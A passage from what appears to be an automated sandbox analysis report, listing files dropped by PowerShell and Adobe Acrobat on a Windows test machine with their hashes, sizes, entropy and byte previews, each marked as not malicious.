                                                                                                SSDEEP:768:RNOpblrU6TBH44ADKZEgxS9/yvTaDcbxGVHq1Gul3tkuhYyu:6a6TZ44ADExS9aLhtGVKDhK
                                                                                                MD5:B946C1ADDF275E4EA10C68FF10C3CA68
                                                                                                SHA1:A0113AF2D640B8BACCF5015DC4BAD5189F34FAF2
                                                                                                SHA-256:D6BCB3FA1659DCD165077C9D7AE4DD2683CD2B6C9306BE755707FE5C7708D4A1
                                                                                                SHA-512:81880E93AF08487B8D5C77C88524055D7E307EAF7A2EC2197A31743EE655FB30743E800083E0D6D8910BB9E82E194E8E3A09D7A96BEBD01A1EAEEA1955C1460C
                                                                                                Malicious:false
                                                                                                Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):64
                                                                                                Entropy (8bit):1.1940658735648508
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:NlllulP/i//lz:NllUC1
                                                                                                MD5:4423EBCAFF1242003F7A449444C9F13E
                                                                                                SHA1:E4792504D19CA2B65858512F2079165BDF7A8317
                                                                                                SHA-256:3749AB8709FAA3A0776B1D63A560E5B64A8B540EC4DBF0C7871C3A4250885283
                                                                                                SHA-512:E9B81FEE02A70FE5F88B494C27E4F89597D33F287F589CBBA16EA3879094BF0A347D31303C6DF2F485790926CD5AF18A1D260E5C2C308A4A8258BDA2B5E7B146
                                                                                                Malicious:false
                                                                                                Preview:@...e.................................^..............@..........

                                                                                                C:\Users\user\AppData\Local\Temp\MSI101bd.LOG

                                                                                                Download File
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):246
                                                                                                Entropy (8bit):3.5325285763919316
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8mUlAx:Qw946cPbiOxDlbYnuRKp
                                                                                                MD5:286661BFEF2329DC3FB276FE933BF698
                                                                                                SHA1:2D6449AC870C068776957F66BC6A9F87060333CE
                                                                                                SHA-256:48109FEF1E68D3094B23B5884934F52D0BABB3A35B02DE046D02204107B7869D
                                                                                                SHA-512:BF871934DA2182FB150986CBEB2B71429E914EFCA596EF86F30B92C7D524F3F8B19A72CCD033FA7632003585A95638914A8267E10C1CB39B6B0A6637B606ECFB
                                                                                                Malicious:false
                                                                                                Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.9./.1.2./.2.0.2.4. . .0.6.:.5.1.:.0.8. .=.=.=.....

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bq4p40ll.ggk.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fqdozznm.h1s.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pixivzhx.omw.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qbcbowrn.lop.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x4ohwctn.bcw.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xezvi1se.hpm.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-19 06-51-02-517.log

                                                                                                Download File
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:ASCII text, with very long lines (393)
                                                                                                Category:dropped
                                                                                                Size (bytes):16525
                                                                                                Entropy (8bit):5.330589339471305
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:usQfQQjZyDzISMjg0svDBjA49Y0/sQHpMVhrSWD0Wny6WxIWd44mJmtaEKHvMMwh:Ink
                                                                                                MD5:5BC0A308794F062FEC40F3016568DF9F
                                                                                                SHA1:14149448191AB45E99011CBBEF39F2A9A03A0D15
                                                                                                SHA-256:00D910C49F2885F6810F4019A916EFA52F12881CBF1525853D0C184E1B796473
                                                                                                SHA-512:CF12E0787C1C2A129BE61C4572CF8A28FC48039B2ADFD1816E58078D8DD900771442F210C545AD9B3F4EAEC23F6F1480F7BBF262B6A631160B20D0785BC17242
                                                                                                Malicious:false
                                                                                                Preview:SessionID=eddad23d-dbc6-40b3-ba9e-21a55d862f0a.1696497318171 Timestamp=2023-10-05T10:15:18:171+0100 ThreadID=7060 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=eddad23d-dbc6-40b3-ba9e-21a55d862f0a.1696497318171 Timestamp=2023-10-05T10:15:18:172+0100 ThreadID=7060 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=eddad23d-dbc6-40b3-ba9e-21a55d862f0a.1696497318171 Timestamp=2023-10-05T10:15:18:172+0100 ThreadID=7060 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=eddad23d-dbc6-40b3-ba9e-21a55d862f0a.1696497318171 Timestamp=2023-10-05T10:15:18:172+0100 ThreadID=7060 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=eddad23d-dbc6-40b3-ba9e-21a55d862f0a.1696497318171 Timestamp=2023-10-05T10:15:18:172+0100 ThreadID=7060 Component=ngl-lib_NglAppLib Description="SetConfig:

                                                                                                C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

                                                                                                Download File
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):15114
                                                                                                Entropy (8bit):5.343631358080695
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:RrXodJkmgYRHFLr2BOy5HqEN9qh+VKiLwLJbVN7IBgwISyD0encJfafujpLP+hRc:OR4
                                                                                                MD5:F7B755E0DCF50E88F04A339587EE0946
                                                                                                SHA1:128B60138626860CB21AFC7B7D9ADA34CA048FC4
                                                                                                SHA-256:65FEACC4E3218068C44FA718DF46B75D3928CAAC527C69697FBBC8274B1A86AB
                                                                                                SHA-512:945009BB2F4FD60C836000B60161484DDFA27E601199BC480613F8E989108C9063DB344D7681D18D0944DCF62F3F838A93A48333E808E9B45E67A37B4EBBDBFC
                                                                                                Malicious:false
                                                                                                Preview:SessionID=1fa54976-3eab-4191-8ede-874a1eeb5c2d.1734609062543 Timestamp=2024-12-19T06:51:02:543-0500 ThreadID=7620 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=1fa54976-3eab-4191-8ede-874a1eeb5c2d.1734609062543 Timestamp=2024-12-19T06:51:02:549-0500 ThreadID=7620 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=1fa54976-3eab-4191-8ede-874a1eeb5c2d.1734609062543 Timestamp=2024-12-19T06:51:02:549-0500 ThreadID=7620 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=1fa54976-3eab-4191-8ede-874a1eeb5c2d.1734609062543 Timestamp=2024-12-19T06:51:02:550-0500 ThreadID=7620 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=1fa54976-3eab-4191-8ede-874a1eeb5c2d.1734609062543 Timestamp=2024-12-19T06:51:02:550-0500 ThreadID=7620 Component=ngl-lib_NglAppLib Description="SetConf

                                                                                                C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                                                                                                Download File
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):29752
                                                                                                Entropy (8bit):5.392300489930103
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:icbENIn5cbqlcbgIpLcbJcb4I5jcbKcbQIrxcbmRiUUAjkxe7zGTidKTi0bKneob:8qnXopZ50rDsxK
                                                                                                MD5:F5A2259F2A33D2C831E426E8E89E13B0
                                                                                                SHA1:67E24279D452AB85850F9291DE3FB631970BB804
                                                                                                SHA-256:DB8D119CDD6EA74CC9939F22A42CE211CDA35B494FB633DA573C6CDAC01CEED4
                                                                                                SHA-512:0450A4D476712097B0AE030B154BF9D25E087C6AFF6A1E035B846D3DCFF62284495918AC90EA596653F85270B5C812B3C5FFE213B5BEBE3A5992E5F945331D3B
                                                                                                Malicious:false
                                                                                                Preview:05-10-2023 10:01:02:.---2---..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 10:01:02:.Closing File..05-10-

                                                                                                C:\Users\user\AppData\Local\Temp\acrocef_low\3f3fa6e2-0afe-4b13-b421-0dfec6d2f215.tmp

                                                                                                Download File
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                                                Category:dropped
                                                                                                Size (bytes):1419751
                                                                                                Entropy (8bit):7.976496077007677
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:/xA7owWLEwYIGNPMGZfPdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLEwZGuGZn3mlind9i4ufFXpAXkru
                                                                                                MD5:152317AB9AD27A4EF2AEDD551E5C0A26
                                                                                                SHA1:5C82D6816A32B57F62787823676F32B6568D2072
                                                                                                SHA-256:130E89C69D9ACB34B88A39245E989EB1E243311D0C2D71BA1DD46FD2A9C0BDDD
                                                                                                SHA-512:3736755453E7E2045602B92BC1EC015E3F009980EABBD5A25A60489CF07BED123F42284E9209AA96E19503CE5964CEBEEF33DC2C64AFBB69135060E3E45A1B1B
                                                                                                Malicious:false
                                                                                                Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                                                C:\Users\user\AppData\Local\Temp\acrocef_low\55e53712-3987-4a7a-94ea-f0fdf80296af.tmp

                                                                                                Download File
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                                Category:dropped
                                                                                                Size (bytes):758601
                                                                                                Entropy (8bit):7.98639316555857
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                                                MD5:3A49135134665364308390AC398006F1
                                                                                                SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                                SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                                SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                                Malicious:false
                                                                                                Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

                                                                                                C:\Users\user\AppData\Local\Temp\acrocef_low\9375bbc5-3251-4854-a8f0-7cc51e0c1098.tmp

                                                                                                Download File
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                                Category:dropped
                                                                                                Size (bytes):386528
                                                                                                Entropy (8bit):7.9736851559892425
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                                MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                                SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                                SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                                SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                                Malicious:false
                                                                                                Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

                                                                                                C:\Users\user\AppData\Local\Temp\acrocef_low\f34d9916-188f-4d45-85db-1f3e583e8b1b.tmp

                                                                                                Download File
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                                                Category:dropped
                                                                                                Size (bytes):1407294
                                                                                                Entropy (8bit):7.97605879016224
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                                                                                                MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                                                                                                SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                                                                                                SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                                                                                                SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                                                                                                Malicious:false
                                                                                                Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDesusertions\590aee7bdd69b59b.customDesusertions-ms (copy)

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):6220
                                                                                                Entropy (8bit):3.7111514252902724
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:Tx9PoKMQ0aSCMFU2bHyywwukvhkvklCyw1ZlwElUWjSogZo95lwElajSogZop1:n6Q4CLQFgkvhkvCCt/lwE8HIlwEjHu
                                                                                                MD5:E99D3CF892D66F7B071E9FE9D0C5F410
                                                                                                SHA1:97D14469BDB34349E0ED294FAF38E4EDD5D6E507
                                                                                                SHA-256:5930AE2E205D36409D42D8AB43ECA24774A4710CB7615A68C7D4A580E1AF1019
                                                                                                SHA-512:0940A0AA35045F29F7A7687176B9B50595F2D1A0D23267FC6C1815CA7926DDA6C15F985BAF2FB88DF6D7E44B558ED125F375C76CE628A7BAE7768A91CC522EEE
                                                                                                Malicious:false
                                                                                                Preview:...................................FL..................F.".. ....'GDj....3_;.R..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......bBDj....{.6.R..{.k;.R......t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsG.YT^..........................=...A.p.p.D.a.t.a...B.V.1......YR^..Roaming.@......EWsG.YR^..........................a.W.R.o.a.m.i.n.g.....\.1.....EWiI..MICROS~1..D......EWsG.YP^..........................p.q.M.i.c.r.o.s.o.f.t.....V.1.....EW.J..Windows.@......EWsG.YP^..........................\0`.W.i.n.d.o.w.s.......1.....EWuG..STARTM~1..n......EWsG.YP^....................D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW.I..Programs..j......EWsG.YP^....................@.....?5..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EWsGEWsG..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EWsG.YV^................

                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDesusertions\G42W54RR2B4SMEKRZAQW.temp

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):6220
                                                                                                Entropy (8bit):3.7111514252902724
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:Tx9PoKMQ0aSCMFU2bHyywwukvhkvklCyw1ZlwElUWjSogZo95lwElajSogZop1:n6Q4CLQFgkvhkvCCt/lwE8HIlwEjHu
                                                                                                MD5:E99D3CF892D66F7B071E9FE9D0C5F410
                                                                                                SHA1:97D14469BDB34349E0ED294FAF38E4EDD5D6E507
                                                                                                SHA-256:5930AE2E205D36409D42D8AB43ECA24774A4710CB7615A68C7D4A580E1AF1019
                                                                                                SHA-512:0940A0AA35045F29F7A7687176B9B50595F2D1A0D23267FC6C1815CA7926DDA6C15F985BAF2FB88DF6D7E44B558ED125F375C76CE628A7BAE7768A91CC522EEE
                                                                                                Malicious:false
